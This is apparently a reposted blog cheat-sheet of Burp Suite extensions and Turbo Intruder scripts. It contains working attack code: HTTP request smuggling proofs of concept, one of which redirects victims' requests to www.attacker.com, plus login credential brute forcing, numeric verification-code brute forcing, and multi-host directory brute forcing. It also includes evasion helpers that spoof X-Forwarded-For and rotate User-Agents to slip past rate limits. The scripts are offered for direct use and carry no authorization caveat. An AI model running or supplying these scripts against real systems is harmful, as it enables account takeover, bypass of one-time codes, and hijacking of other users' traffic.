  • burp

    Burp 2020.7 Chinese localization and mouse-focus fix

    https://mp.weixin.qq.com/s/eO4bMaDrUrNoRttcykMfpA  

    IP proxy rotation

    https://github.com/RhinoSecurityLabs/IPRotate_Burp_Extension

    https://github.com/AeolusTF/BurpFakeIP
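
    IPRotate rotates the real source IP by relaying traffic through AWS API Gateway, while BurpFakeIP spoofs the client IP via request headers. As a rough illustration of the header approach (a minimal sketch, not the code of either project), a Jython extension against the legacy Burp Extender API could look like this; the extension name and the random octet range are arbitrary:

# Minimal sketch, assuming the legacy Burp Extender API and a Jython runtime.
# It appends a random X-Forwarded-For header to every outgoing request.
from burp import IBurpExtender, IHttpListener
import random

class BurpExtender(IBurpExtender, IHttpListener):
    def registerExtenderCallbacks(self, callbacks):
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Random X-Forwarded-For (sketch)")
        callbacks.registerHttpListener(self)

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        if not messageIsRequest:
            return
        request = messageInfo.getRequest()
        info = self._helpers.analyzeRequest(request)
        # drop any existing X-Forwarded-For header, then add a random one
        headers = [h for h in info.getHeaders() if not h.lower().startswith("x-forwarded-for:")]
        fake_ip = ".".join(str(random.randint(1, 254)) for _ in range(4))
        headers.append("X-Forwarded-For: " + fake_ip)
        body = request[info.getBodyOffset():]
        messageInfo.setRequest(self._helpers.buildHttpMessage(headers, body))

    Header spoofing only helps when the application trusts X-Forwarded-For; IPRotate's API Gateway approach changes the actual TCP source address instead.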

    User-Agent rotation

    https://github.com/m4ll0k/BurpSuite-Random_UserAgent
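
    The linked extension randomizes the User-Agent on live proxy traffic. If you only need rotation during a Turbo Intruder attack, the same idea can be sketched in the attack script itself; this assumes a second %s placeholder is placed inside the User-Agent header of the request template, and the tiny UA list and the wordlist path below are placeholders:

# Sketch only: rotate the User-Agent per queued request in Turbo Intruder.
# Assumes the request template contains two %s placeholders:
# one in the parameter being brute forced and one in the User-Agent header.
import random

USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
]

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=10,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    for word in open('D:/dict.txt'):  # placeholder wordlist path
        engine.queue(target.req, [word.rstrip(), random.choice(USER_AGENTS)])

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
        table.add(req)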

    Highlight marking

    https://github.com/nian-hua/BurpExtender
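
    For reference, highlighting can also be done in a few lines with the legacy Extender API. The listener below is my own sketch, not the linked project's code: it colours Proxy-history entries whose URL contains one of a few hypothetical keywords.

# Minimal sketch, assuming the legacy Burp Extender API and a Jython runtime.
from burp import IBurpExtender, IHttpListener

# hypothetical keyword list; adjust to whatever you want flagged
KEYWORDS = ["upload", "admin", "redirect="]

class BurpExtender(IBurpExtender, IHttpListener):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Keyword highlighter (sketch)")
        callbacks.registerHttpListener(self)

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        # highlights and comments only take effect on Proxy history entries
        if toolFlag != self._callbacks.TOOL_PROXY or messageIsRequest:
            return
        url = str(self._helpers.analyzeRequest(messageInfo).getUrl())
        if any(k in url for k in KEYWORDS):
            messageInfo.setHighlight("red")
            messageInfo.setComment("keyword hit")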

    Turbo Intruder

    HTTP request smuggling
    (1) Proof of concept

# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
import time

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0
                           )
    engine.start()

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''GET /sso/request HTTP/1.1
X-Ignore: X'''

    # The request engine will auto-fix the Content-Length for us
    attack = target.req + prefix
    engine.queue(attack)

    # queue a batch of normal requests so one of them picks up the smuggled prefix
    victim = target.req
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)

    (2) Redirect

# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
import time

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0
                           )
    engine.start()

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''GET / HTTP/1.1
Host: www.attacker.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

x=10
'''

    # The request engine will auto-fix the Content-Length for us
    attack = target.req + prefix
    engine.queue(attack)

    victim = target.req
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)

    Username/password brute force

from urllib import quote

def password_brute(target, engine):
    for word in open('/Users/mac/safe/web/brute/mypass.txt'):
        engine.queue(target.req, quote(word.rstrip()))

def user_brute(target, engine):
    for word in open('/Users/mac/safe/web/brute/myuser.txt'):
        engine.queue(target.req, quote(word.rstrip()))

def user_password_brute(target, engine):
    # the request template needs two %s placeholders: one for the user, one for the password
    for password in open('D:/res.txt'):
        for user in open('D:/user.txt'):
            engine.queue(target.req, [quote(user.rstrip()), quote(password.rstrip())])

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    # user_brute(target, engine)
    # password_brute(target, engine)
    user_password_brute(target, engine)

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    # keep responses that don't contain 'false' (likely successful logins); adjust to the target
    if 'false' not in req.response:
        table.add(req)



    Multi-host directory brute force

def mult_host_dir_brute():
    # raw request template: the path and Host header are filled in per word / per target
    req = '''GET /%s HTTP/1.1
Host: %s
Connection: keep-alive

'''
    # build one request engine per URL listed in urls.txt
    engines = {}
    for url in open('urls.txt'):
        url = url.rstrip()
        engine = RequestEngine(endpoint=url,
                               concurrentConnections=5,
                               requestsPerConnection=100,
                               pipeline=True)
        engines[url] = engine

    # replay every wordlist entry against every target
    for word in open('D:/Fuzz_dic-master/Fuzz_dic/dirsearch.txt'):
        word = word.rstrip()
        for (url, engine) in engines.items():
            domain = url.split('/')[2]
            engine.queue(req, [word, domain])


def queueRequests(target, wordlists):
    mult_host_dir_brute()


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
        table.add(req)

    Single-host directory brute force
# Find more example scripts at https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/default.py
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=True
                           )

    # teach the response filter what boring responses look like so `interesting` works below
    for i in range(3, 8):
        engine.queue(target.req, randstr(i), learn=1)
        engine.queue(target.req, target.baseInput, learn=2)

    for word in open('D:/Fuzz_dic-master/Fuzz_dic/dirsearch.txt'):
        engine.queue(target.req, word.rstrip())


def handleResponse(req, interesting):
    if interesting:
        table.add(req)

    Verification-code brute force

from itertools import product

def brute_verify_code(target, engine, length):
    # enumerate every numeric code of the given length (e.g. 0000-9999 for length 4)
    pattern = '1234567890'
    for i in list(product(pattern, repeat=length)):
        code = ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    # code length is usually 4 or 6; set it to match the target
    brute_verify_code(target, engine, 4)

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if 'error' not in req.response:  # adjust the filter to the target's failure message
        table.add(req)
  • Original post: https://www.cnblogs.com/AtesetEnginner/p/11307628.html